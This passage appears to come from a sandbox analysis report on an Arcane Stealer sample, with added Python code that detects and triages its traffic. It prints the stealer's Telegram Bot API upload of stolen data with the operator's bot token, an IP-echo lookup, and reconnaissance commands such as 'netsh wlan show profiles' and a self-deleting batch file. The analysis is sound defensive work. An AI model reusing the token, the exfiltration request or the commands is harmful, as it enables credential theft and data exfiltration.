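        ts = datetime.strptime(m["ts"], "%b %d, %Y %H:%M:%S")
        # The report prints nanoseconds; datetime keeps microseconds, which is enough here.
        ts += timedelta(microseconds=int(m["frac"][:6]))
        events.append((ts, m["src"], m["name"].lower()))
    return sorted(events)


def correlate(events, window_s=60):
    """Return (src, echo_name, exfil_name, delta_seconds) for every host that resolved an
    IP-echo service and then an exfil API within window_s seconds."""
    hits = []
    last_echo = {}  # source IP -> (timestamp, echo domain) of its latest IP-echo lookup
    for ts, src, name in events:
        if name in IP_ECHO_DOMAINS:
            last_echo[src] = (ts, name)
        elif name in EXFIL_API_DOMAINS and src in last_echo:
            echo_ts, echo_name = last_echo[src]
            delta = (ts - echo_ts).total_seconds()
            if 0 <= delta <= window_s:
                hits.append((src, echo_name, name, round(delta, 3)))
    return hits


if __name__ == "__main__":
    for hit in correlate(parse_queries(DNS_QUERIES_CET)):
        print("IP-echo then exfil API from %s: %s -> %s after %.3fs" % hit)
```

On the report's data this yields one hit for 192.168.11.20 (icanhazip.com, then api.telegram.org about six seconds later). The PTR lookup in between is ignored; it is neither an echo service nor an exfil endpoint.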
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 49756 | 104.16.184.241 | 80 | 4524 | C:\Users\user\Desktop\zyEDYRU0jw.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 19:54:36.278979063 CET | 63 | OUT | GET / HTTP/1.1
    Host: icanhazip.com
    Connection: Keep-Alive
Dec 17, 2024 19:54:36.455025911 CET | 538 | IN | HTTP/1.1 200 OK
    Date: Tue, 17 Dec 2024 18:54:36 GMT
    Content-Type: text/plain
    Content-Length: 16
    Connection: keep-alive
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET
    Set-Cookie: __cf_bm=UchbMD0G48zV7fm4tvOOW2fzibBXQ_CGaPlJSgVpxbY-1734461676-1.0.1.1-HxB0DKu7Nd.jeMIf_y602p78vhaEg3hzNqLUg2tLZju6ddFSWzRY_06z2gDs_Pa5xwuZwTnlXdLDBQNEAol8OQ; path=/; expires=Tue, 17-Dec-24 19:24:36 GMT; domain=.icanhazip.com; HttpOnly
    Server: cloudflare
    CF-RAY: 8f391f652e9e32e0-JAX
    alt-svc: h3=":443"; ma=86400
    Data Raw: 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 30 35 0a
    Data Ascii: 102.129.152.205


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 49757 | 149.154.167.220 | 443 | 4524 | C:\Users\user\Desktop\zyEDYRU0jw.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 18:54:42 UTC | 259 | OUT | POST /bot7501458999:AAE_ZNbE_D3XZ8TXpCn-L8D8f4rkvZodj0c/sendDocument HTTP/1.1
    Content-Type: multipart/form-data; boundary="2c67de8b-644a-4406-b045-374572e7377e"
    Host: api.telegram.org
    Content-Length: 120588
    Expect: 100-continue
    Connection: Keep-Alive
2024-12-17 18:54:43 UTC | 40 | OUT | Data Raw: 2d 2d 32 63 36 37 64 65 38 62 2d 36 34 34 61 2d 34 34 30 36 2d 62 30 34 35 2d 33 37 34 35 37 32 65 37 33 37 37 65 0d 0a
    Data Ascii: --2c67de8b-644a-4406-b045-374572e7377e
2024-12-17 18:54:43 UTC | 131 | OUT | Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5b 45 4e 5d 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 30 35 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 25 35 42 45 4e 25 35 44 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 30 35 2e 7a 69 70 0d 0a 0d 0a
    Data Ascii: Content-Disposition: form-data; name=document; filename="[EN]102.129.152.205.zip"; filename*=utf-8''%5BEN%5D102.129.152.205.zip
2024-12-17 18:54:43 UTC | 4096 | OUT | Data Raw: 50 4b 03 04 14 00 00 00 08 00 d1 6e 91 59 ab 48 79 56 1f 00 00 00 1d 00 00 00 0e 00 00 00 50 72 6f 64 75 63 74 4b 65 79 2e 74 78 74 0b f0 f2 f5 30 d3 f5 f3 f2 8e f0 d5 0d 74 f6 0d 8f d4 75 0a f0 8a f0 d2 0d 09 72 f6 f5 00 00 50 4b 03 04 14 00 00 00 08 00 d1 6e 91 59 f5 d4 84 f6 e6 00 00 00 dc 02 00 00 15 00 00 00 49 6e 73 74 61 6c 6c 65 64 42 72 6f 77 73 65 72 73 2e 74 78 74 ed 90 31 6f 83 30 10 85 67 f3 2b 3c 26 8b e5 03 84 a0 5b 12 a5 55 86 54 99 da c5 8b 45 0e 62 c9 70 c8 10 09 f5 d7 f7 8a 95 4a 2d 73 b7 4e b6 de 7b fe fc ee 5e 6d 87 e2 62 a7 9b 78 c3 30 3a ea 93 33 7d 38 ef ad 7c 76 01 1b 9a c5 e1 c9 5c 02 b5 c1 76 2c 79 1c cd af 80 69 e2 a9 70 46 51 81 d2 0a 92 17 a2 d6 a3 3c dc 02 31 7e 45 88 b6 89 b6 d9 0d 83 77 b5 9d f8 73 53 2f d2 82 82 b4 64 56
    Data Ascii: PKnYHyVProductKey.txt0turPKnYInstalledBrowsers.txt1o0g+<&[UTEbpJ-sN{^mbx0:3}8|v\v,yipFQ<1~EwsS/dV
2024-12-17 18:54:43 UTC | 4096 | OUT | Data Raw: 05 80 5a 54 4d 47 aa 06 50 dc 96 4f 2a 23 88 c4 c8 83 e6 ca b4 c1 dc 7b f8 e4 f0 61 22 9b 03 eb ce 98 1c f1 3c 24 91 7a ec 07 25 4b 5b 3b a1 93 46 14 29 25 a9 86 f4 17 72 bc 53 a5 91 b0 0a 3f a4 a0 30 82 40 40 2d 94 83 59 2f e3 e4 3c 92 75 d3 70 72 33 52 21 36 6b 93 e6 4e 2f 00 5c a7 92 f9 87 04 b4 de c2 69 66 e6 cb e8 51 17 29 df 55 ea 0c db 2f ca 56 e1 c3 91 f0 8a 90 57 99 c4 1b c2 02 fc e9 16 87 05 a1 8b 52 e8 17 ce c6 24 ab 24 64 92 06 a0 cb 50 e9 ed a0 0e 83 d8 f1 52 38 c9 58 d8 ca 50 29 8d 7b 19 3b 30 9b 11 83 b5 e1 39 c2 05 a9 46 76 28 76 67 7a 93 ed 28 7d 9e b1 e8 81 64 22 d6 05 e9 20 6a e7 00 a8 7c e5 6d 47 46 54 60 33 8c 3d ed 9f 9d a6 c5 d4 19 22 1d 4a 96 c0 da 17 fe 07 e9 69 de 38 02 68 9f 59 00 f7 97 8e 4a 7c 61 56 55 82 5c bb 29 04 f0 bf 93
    Data Ascii: ZTMGPO*#{a"<$z%K[;F)%rS?0@@-Y/<upr3R!6kN/\ifQ)U/VWR$$dPR8XP){;09Fv(vgz(}d" j|mGFT`3="Ji8hYJ|aVU\)
2024-12-17 18:54:43 UTC | 4096 | OUT | Data Raw: 96 59 4f 43 84 a8 ca 6a fe 34 3c c8 a5 56 86 b7 e9 4a 35 88 9e 69 7b 4f 9e 74 2a 7c e0 62 96 29 d6 00 42 a6 0c fd 56 e1 a7 03 9d 56 91 92 23 88 2e 33 47 16 18 6e 24 cb 98 2a 8a a1 ec 82 f9 a4 54 d1 ea eb a2 3e b0 1d 56 b1 6d 16 ee bd 35 09 a9 52 0d 41 3c 4e 6a 80 20 62 45 54 4b 26 7b 00 b4 00 9c cb a0 b4 45 57 30 99 13 7c 3b 29 a8 13 35 40 16 06 99 bc 7d b9 81 5c ec 24 e6 3e b6 b2 ea 10 6b b1 64 77 5e 73 44 7d 00 2f f9 6e 9b 2e 92 c2 0e 0e 27 30 bc 03 5b 67 53 cc da 89 c4 76 84 81 c3 2c 54 58 6e f2 92 ef d2 42 78 95 11 3f 35 da 95 d9 aa b2 71 86 18 43 ab 41 f5 cf 2c ae c1 13 ec 43 42 a2 26 1a 80 c4 dc b3 9d e3 69 1d b7 d0 ac c3 c7 4d ff e2 3e a2 f3 ac dd 10 41 f1 ec 2b d1 c8 6a 8f 9c 3d d9 ae b5 16 ab bf c5 59 d9 ae cb 32 d9 91 61 78 3c e5 c6 17 8f 8c 3f
    Data Ascii: YOCj4<VJ5i{Ot*|b)BVV#.3Gn$*T>Vm5RA<Nj bETK&{EW0|;)5@}\$>kdw^sD}/n.'0[gSv,TXnBx?5qCA,CB&iM>A+j=Y2ax<?
2024-12-17 18:54:43 UTC | 4096 | OUT | Data Raw: 7d 13 6f 88 b3 03 1d e4 20 ca bf 35 13 c4 43 bb 67 42 7a 3c dc 1c eb 30 26 d6 4f 35 40 6a c1 d1 1d 47 4d ce ac 1f f0 5e 92 59 ff 0f c2 74 21 b2 ec 2f 6f 2c d9 bf 0b 8c 67 73 11 71 ae 20 aa 04 8c 7f 81 10 07 30 6a 6b 97 1a 31 8b b4 d1 73 01 46 9b 40 06 3f 0b c1 78 6e 8a fd 51 2f 65 ac 2d 50 5e e0 db 01 46 f6 d8 9f b1 fe 7f 3e de fa 88 bc 40 c8 ec 44 67 66 d6 6c 32 36 cf ff d4 fd d2 b5 b2 e5 ed de 1b bf 52 16 ec 9f f0 36 a3 c9 e0 01 8e fe 01 57 61 77 5a 77 12 5d dd ce 0e e0 76 5c b0 e8 2e 38 14 80 2f 8b 74 f8 2b e2 bf 0a ab 1f d5 5d 34 99 56 86 ae d3 4b bb f4 a3 54 2b dd 6d a3 b6 33 73 c5 5b 5e 5a 29 3a 17 a2 7f 50 cd 7f d5 d2 e6 3f d7 46 01 6d 27 4d c3 59 45 69 3d 73 d5 01 c5 88 c3 d4 50 70 5c 0b b5 6b a3 08 a0 0b 1b 8e 03 83 72 a5 b6 78 1a 79 9b b9 e8 f0
    Data Ascii: }o 5CgBz<0&O5@jGM^Yt!/o,gsq 0jk1sF@?xnQ/e-P^F>@Dgfl26R6WawZw]v\.8/t+]4VKT+m3s[^Z):P?Fm'MYEi=sPp\krxy
2024-12-17 18:54:43 UTC | 4096 | OUT | Data Raw: 22 55 92 e8 74 a9 b3 94 87 1c b7 13 81 62 a1 af 63 f6 3b 65 81 cb 6b bc 4a 21 c8 e4 4b bd 3a 28 41 a1 70 31 ad 72 31 7f 5a c6 1a 82 1f 92 8e 7a c2 2c 84 7d 9d 59 f3 49 a8 5e 75 69 46 36 38 14 50 5b 7c 27 84 04 f9 a6 52 18 af f2 eb aa 88 52 17 f1 10 c5 9e d0 12 2e cd ed 99 c8 76 9e 6f c7 3f d4 0e 2b 80 0d e2 23 dc 6d a6 29 37 fd 92 8c a5 34 19 70 91 6d d5 87 40 11 67 94 b7 87 5c 54 58 7d 45 e6 49 99 81 f5 4b d9 94 8c 19 2f d7 49 17 76 77 2b fc 7b 26 46 d2 25 ce f3 ed 15 a2 9b 09 4c 55 9b 44 4d 16 88 9d de 8b 0b 5c 32 e2 24 3d 7e 1b 5b 48 ea e4 85 40 9c cc 4e bb a2 9c 41 51 34 03 56 65 66 89 cd e8 0b b0 aa fd 82 29 b3 50 a9 d4 13 94 b2 29 d5 4c 28 d7 31 97 87 33 a4 a0 7d f3 16 0b b9 1c d8 2d f5 cd 58 e7 97 37 d3 de cb 44 54 5b 25 1e ae a7 75 6b c2 06 2b 7f
    Data Ascii: "Utbc;ekJ!K:(Ap1r1Zz,}YI^uiF68P[|'RR.vo?+#m)74pm@g\TX}EIK/Ivw+{&F%LUDM\2$=~[H@NAQ4Vef)P)L(13}-X7DT[%uk+
2024-12-17 18:54:43 UTC | 4096 | OUT | Data Raw: a0 eb bb 4d 9b 8f 4e 76 30 03 1e 9e 42 d5 63 33 7b 42 78 83 17 fc 1e 9c 6e ff f1 80 f3 f8 f1 15 79 ef 33 b7 c6 c6 2f 73 cf 22 a6 5a 2f b7 23 09 09 25 c5 23 57 93 c2 d1 6d 55 5c 6b b6 57 4d 6e cf 50 a8 af dd fb 4f d4 75 87 07 3d e4 9b ad 81 d7 2b ee fe 31 1d 2b 67 e4 bf 3d c5 ee 1d 8d 73 d2 70 f2 b5 3a 04 7d c2 28 d0 79 55 f8 69 1d b7 5c c3 37 d4 13 84 e3 df bd 7c bf dd 6b 4b e7 35 6d 6e 3d d6 5a 90 55 b3 19 af 93 aa ea 3c 43 5d 62 d7 49 5f b2 95 20 de 96 f7 a1 51 c5 c5 ff a2 f6 71 0b 10 aa c3 86 41 28 6d d2 ba cc ba e8 5d 62 57 ac 58 2a 38 91 da 2a 80 5f 24 90 db 4b 14 3f ea 2f 6e f0 0a 0d 94 ef 12 33 25 c1 43 75 89 b4 2b 6d eb 54 38 3b 4b 67 cf 2c 7e a9 f9 38 fa a0 79 31 8e ff d0 80 c1 13 16 2d d1 00 f7 66 26 20 d5 ce c5 f8 22 e9 17 e1 9a ac 1f 2e 33 59
    Data Ascii: MNv0Bc3{Bxny3/s"Z/#%#WmU\kWMnPOu=+1+g=sp:}(yUi\7|kK5mn=ZU<C]bI_ QqA(m]bWX*8*_$K?/n3%Cu+mT8;Kg,~8y1-f& ".3Y
2024-12-17 18:54:43 UTC | 4096 | OUT | Data Raw: 95 9c 35 bd 41 a3 bd 71 cc b0 87 26 d8 b6 1d 17 2a 37 55 e7 05 1d 82 6c 38 6a 2a 78 b8 08 1c 6c 7f 20 54 6b f9 ca 3d 7a 76 a4 46 5e bc 26 e2 e4 89 db e7 54 b7 5a 9c 66 3b de ba 9b ea ba 8f a0 42 c8 0a a8 42 3f f8 5b 6b e1 dd bd 81 12 fe 8e 75 e7 cf f6 0d 45 7e 62 36 06 ea bf dd aa 9a a2 a4 8e f3 23 bd 18 0b b4 8e 73 46 05 7d 78 ff d2 c8 ed 41 dd 80 b1 24 e3 5d df f1 8f a7 23 37 57 d4 45 42 9d 98 a4 86 1a 71 16 3a ff 0e fb 08 2b ec 73 74 d8 e4 22 a0 3f 34 75 a0 e0 e9 8a 00 d1 1b 11 66 6a 6a 5b ab bd 55 54 7c aa 14 d7 ae 9a 35 38 68 3d d4 69 72 c3 ff 6f ab 2d 61 4f 85 ea af 5f 8f 10 ac ec 4c 8d ee c3 33 f3 e6 94 31 0d 2f 92 14 0a 1a bf 9d b7 ba a8 90 2b 26 be ea 7c d0 b4 f6 ca a9 fc c7 f2 ef cb 6e 30 82 b6 e8 43 dd 42 be a9 55 fe de de 2c c2 b8 8c 3d ba bc
    Data Ascii: 5Aq&*7Ul8j*xl Tk=zvF^&TZf;BB?[kuE~b6#sF}xA$]#7WEBq:+st"?4ufjj[UT|58h=iro-aO_L31/+&|n0CBU,=
2024-12-17 18:54:43 UTC | 4096 | OUT | Data Raw: 08 b4 81 4e 75 d3 22 30 6f fc f9 67 df 5b a7 6f 0b f8 be 43 c6 e5 d5 ba d7 df 79 f6 9d 0b 47 b9 bd 48 2a 0d 58 04 de f8 7f 1b 9f 03 d3 a2 99 01 9c 64 4b d2 ec c1 97 68 f0 0f ae 44 6c bb 08 bc eb f8 b0 e0 e6 fe a1 a5 e2 d6 76 4d d7 54 3f 7e 8b 64 35 f3 28 86 13 38 a7 1a 18 5d be 08 0c d7 17 4a 54 02 a1 c4 16 f0 f0 ba 75 c4 89 3d 29 03 49 aa 3e a2 ac f8 80 d2 1d 3b 3f a5 bd 77 f1 9b 73 78 f6 b6 c4 34 19 62 7e de f5 d0 bd 60 46 4f 54 76 47 99 fd 57 fb de 13 66 74 72 2b 16 bf 6d 0c d7 f4 e6 57 d6 bc f4 4a ab d9 81 f8 10 7b d3 de b6 53 3a b2 25 a5 7a d0 fe c7 89 59 49 93 52 5f 9c ff 57 87 fe 1f 99 7d 95 6a c5 f5 18 85 e5 2a f6 d2 46 4e 6b 80 cd aa 45 4b 53 64 4b d4 12 20 a7 15 eb b7 2c 55 b5 2c 58 c2 5c 0a fb 72 4b b5 ee 15 99 4b 31 7a 33 f0 2f 3d e6 d5 52 ea
    Data Ascii: Nu"0og[oCyGH*XdKhDlvMT?~d5(8]JTu=)I>;?wsx4b~`FOTvGWftr+mWJ{S:%zYIR_W}j*FNkEKSdK ,U,X\rKK1z3/=R
2024-12-17 18:54:43 UTC | 25 | IN | HTTP/1.1 100 Continue
2024-12-17 18:54:44 UTC | 863 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Tue, 17 Dec 2024 18:54:44 GMT
    Content-Type: application/json
    Content-Length: 475
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    {"ok":true,"result":{"message_id":1100,"from":{"id":7501458999,"is_bot":true,"first_name":"AYE BOT)","username":"gfhsd68ybufaFGDHSufhbjsn_bot"},"chat":{"id":7768810529,"first_name":"Has been seized","username":"Taldic","type":"private"},"date":1734461684,"document":{"file_name":"[EN]102.129.152.205.zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAIETGdhyPR85Teg4ZtRjwWZPVYB0TScAAJhFQAC2JEQU5IiAfd1mToHNgQ","file_unique_id":"AgADYRUAAtiREFM","file_size":120232}}}
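An added worked example, not part of the Joe Sandbox report and not Arcane's own code, that triages the captured Telegram upload above: it recognises the Bot API token and upload method in the request line, pulls the loot file name from the multipart part header and the bot and chat identity from the JSON reply, then walks the ZIP local file headers in the first body chunk to list what was being exfiltrated, decompressing and CRC-checking any entry whose data is complete. The request line, part header, reply and hex bytes are copied from the session above; the hex is truncated exactly as the page shows it, so only the first entry (ProductKey.txt) is whole and the second is reported as truncated. The UPLOAD_METHODS set and every function name are this example's own assumptions.

```python
import json
import re
import struct
import zlib
from datetime import datetime

# Captured values copied from the Telegram session above.
REQUEST_LINE = "POST /bot7501458999:AAE_ZNbE_D3XZ8TXpCn-L8D8f4rkvZodj0c/sendDocument HTTP/1.1"
PART_HEADER = ('Content-Disposition: form-data; name=document; filename="[EN]102.129.152.205.zip"; '
               "filename*=utf-8''%5BEN%5D102.129.152.205.zip")
REPLY_JSON = ('{"ok":true,"result":{"message_id":1100,"from":{"id":7501458999,"is_bot":true,'
              '"first_name":"AYE BOT)","username":"gfhsd68ybufaFGDHSufhbjsn_bot"},"chat":{"id":7768810529,'
              '"first_name":"Has been seized","username":"Taldic","type":"private"},"date":1734461684,'
              '"document":{"file_name":"[EN]102.129.152.205.zip","mime_type":"application/zip",'
              '"file_id":"BQACAgQAAxkDAAIETGdhyPR85Teg4ZtRjwWZPVYB0TScAAJhFQAC2JEQU5IiAfd1mToHNgQ",'
              '"file_unique_id":"AgADYRUAAtiREFM","file_size":120232}}}')
# First bytes of the upload body: the "Data Raw" hex of the first 4096-byte chunk, truncated as on the page.
BODY_HEX = ("50 4b 03 04 14 00 00 00 08 00 d1 6e 91 59 ab 48 79 56 1f 00 00 00 1d 00 00 00 0e 00 00 00 "
            "50 72 6f 64 75 63 74 4b 65 79 2e 74 78 74 0b f0 f2 f5 30 d3 f5 f3 f2 8e f0 d5 0d 74 f6 0d 8f "
            "d4 75 0a f0 8a f0 d2 0d 09 72 f6 f5 00 00 50 4b 03 04 14 00 00 00 08 00 d1 6e 91 59 f5 d4 84 "
            "f6 e6 00 00 00 dc 02 00 00 15 00 00 00 49 6e 73 74 61 6c 6c 65 64 42 72 6f 77 73 65 72 73 2e "
            "74 78 74 ed 90 31 6f 83 30 10 85 67 f3 2b 3c 26 8b e5 03 84 a0 5b 12 a5 55 86 54 99 da c5 8b "
            "45 0e 62 c9 70 c8 10 09 f5 d7 f7 8a 95 4a 2d 73 b7 4e b6 de 7b fe fc ee 5e 6d 87 e2 62 a7 9b "
            "78 c3 30 3a ea 93 33 7d 38 ef ad 7c 76 01 1b 9a c5 e1 c9 5c 02 b5 c1 76 2c 79 1c cd af 80 69 "
            "e2 a9 70 46 51 81 d2 0a 92 17 a2 d6 a3 3c dc 02 31 7e 45 88 b6 89 b6 d9 0d 83 77 b5 9d f8 73 "
            "53 2f d2 82 82 b4 64 56")

# Bot API paths look like /bot<numeric id>:<secret>/<method>; the secret length is not fixed by a spec.
BOT_PATH = re.compile(r"^/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]{30,})/(?P<method>\w+)")
UPLOAD_METHODS = {"sendDocument", "sendPhoto", "sendVideo", "sendAudio"}  # assumption of this example


def parse_bot_request(request_line):
    """Return bot id, method and whether the call carries a file, or None for non-Bot-API paths."""
    verb, path, _version = request_line.split(" ", 2)
    m = BOT_PATH.match(path)
    if not m:
        return None
    return {"verb": verb, "bot_id": int(m["bot_id"]), "method": m["method"],
            "upload": m["method"] in UPLOAD_METHODS}


def upload_filename(part_header):
    m = re.search(r'filename="([^"]+)"', part_header)
    return m.group(1) if m else None


def parse_reply(text):
    r = json.loads(text)["result"]
    return {"bot": r["from"]["username"], "chat_id": r["chat"]["id"],
            "file": r["document"]["file_name"], "size": r["document"]["file_size"]}


LOCAL_HDR = struct.Struct("<4sHHHHHIIIHH")  # PK\x03\x04 local file header, 30 bytes


def dos_datetime(dos_time, dos_date):
    """Decode the MS-DOS timestamp stored in ZIP headers (local time, 2-second resolution)."""
    return datetime(1980 + (dos_date >> 9), (dos_date >> 5) & 0xF, dos_date & 0x1F,
                    dos_time >> 11, (dos_time >> 5) & 0x3F, (dos_time & 0x1F) * 2)


def walk_zip_entries(body):
    """Walk local file headers front to back; works on a truncated capture with no central directory."""
    entries, pos = [], 0
    while pos + LOCAL_HDR.size <= len(body):
        sig, _ver, _flags, method, mtime, mdate, crc, csize, usize, nlen, xlen = LOCAL_HDR.unpack_from(body, pos)
        if sig != b"PK\x03\x04":
            break
        name_start = pos + LOCAL_HDR.size
        name = body[name_start:name_start + nlen].decode("utf-8", "replace")
        data_start = name_start + nlen + xlen
        data = body[data_start:data_start + csize]
        content = None
        if method == 8 and len(data) == csize:  # 8 = deflate; only inflate complete entries
            try:
                content = zlib.decompressobj(-15).decompress(data)  # raw deflate, no zlib wrapper
            except zlib.error:
                content = None
            if content is not None and (len(content) != usize or zlib.crc32(content) != crc):
                content = None  # stored sizes/CRC disagree: do not trust the bytes
        entries.append({"name": name, "method": method, "csize": csize, "usize": usize, "crc": crc,
                        "mtime": dos_datetime(mtime, mdate), "truncated": len(data) < csize,
                        "content": content})
        pos = data_start + csize
    return entries


def triage():
    return {"request": parse_bot_request(REQUEST_LINE), "filename": upload_filename(PART_HEADER),
            "reply": parse_reply(REPLY_JSON), "entries": walk_zip_entries(bytes.fromhex(BODY_HEX))}


if __name__ == "__main__":
    t = triage()
    print(t["request"], t["filename"], t["reply"])
    for e in t["entries"]:
        print(e["name"], e["mtime"], "%d -> %d bytes" % (e["csize"], e["usize"]),
              "(truncated in capture)" if e["truncated"] else "")
```

Two details worth checking on any such capture: the DOS timestamps inside the archive decode to 2024-12-17 13:54:34, the same local time as the process start in the report, which dates the collection to the sandbox run rather than to some earlier build; and the first entry's uncompressed size of 29 bytes is exactly the length of a Windows product key, consistent with the ProductKey.txt name. The bot token in the request line is the operator's credential and is the indicator worth blocking or reporting to Telegram.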



Target ID: 0
Start time: 13:54:34
Start date: 17/12/2024
Path: C:\Users\user\Desktop\zyEDYRU0jw.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\zyEDYRU0jw.exe"
Imagebase: 0xd30000
File size: 171'008 bytes
MD5 hash: 41D3660B5321768122F4C25AC9868FC3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Arcane, Description: Yara detected Arcane Stealer, Source: 00000000.00000000.108300525828.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.108300525828.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.108300525828.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.108444740921.0000000003281000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 1
Start time: 13:54:34
Start date: 17/12/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "cmd.exe" /c tasklist
Imagebase: 0x680000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 2
Start time: 13:54:34
Start date: 17/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7a8530000
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 13:54:34
Start date: 17/12/2024
Path: C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit): true
Commandline: tasklist
Imagebase: 0x430000
File size: 79'360 bytes
MD5 hash: 0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 13:54:35
Start date: 17/12/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All
Imagebase: 0x680000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

                                                                                              Target ID:5
                                                                                              Start time:13:54:35
                                                                                              Start date:17/12/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7a8530000
                                                                                              File size:875'008 bytes
                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:7
                                                                                              Start time:13:54:35
                                                                                              Start date:17/12/2024
                                                                                              Path:C:\Windows\SysWOW64\chcp.com
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:chcp 65001
                                                                                              Imagebase:0xc30000
                                                                                              File size:12'800 bytes
                                                                                              MD5 hash:41146159AA3D41A92B53ED311EE15693
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:moderate
                                                                                              Has exited:true

                                                                                              Target ID:8
                                                                                              Start time:13:54:35
                                                                                              Start date:17/12/2024
                                                                                              Path:C:\Windows\SysWOW64\netsh.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:netsh wlan show profiles
                                                                                              Imagebase:0x1530000
                                                                                              File size:82'432 bytes
                                                                                              MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:9
                                                                                              Start time:13:54:35
                                                                                              Start date:17/12/2024
                                                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:findstr All
                                                                                              Imagebase:0x560000
                                                                                              File size:29'696 bytes
                                                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:10
                                                                                              Start time:13:54:48
                                                                                              Start date:17/12/2024
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp5FE0.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp5FE0.tmp.bat
                                                                                              Imagebase:0x680000
                                                                                              File size:236'544 bytes
                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:11
                                                                                              Start time:13:54:48
                                                                                              Start date:17/12/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7a8530000
                                                                                              File size:875'008 bytes
                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:12
                                                                                              Start time:13:54:48
                                                                                              Start date:17/12/2024
                                                                                              Path:C:\Windows\SysWOW64\chcp.com
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:chcp 65001
                                                                                              Imagebase:0xc30000
                                                                                              File size:12'800 bytes
                                                                                              MD5 hash:41146159AA3D41A92B53ED311EE15693
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
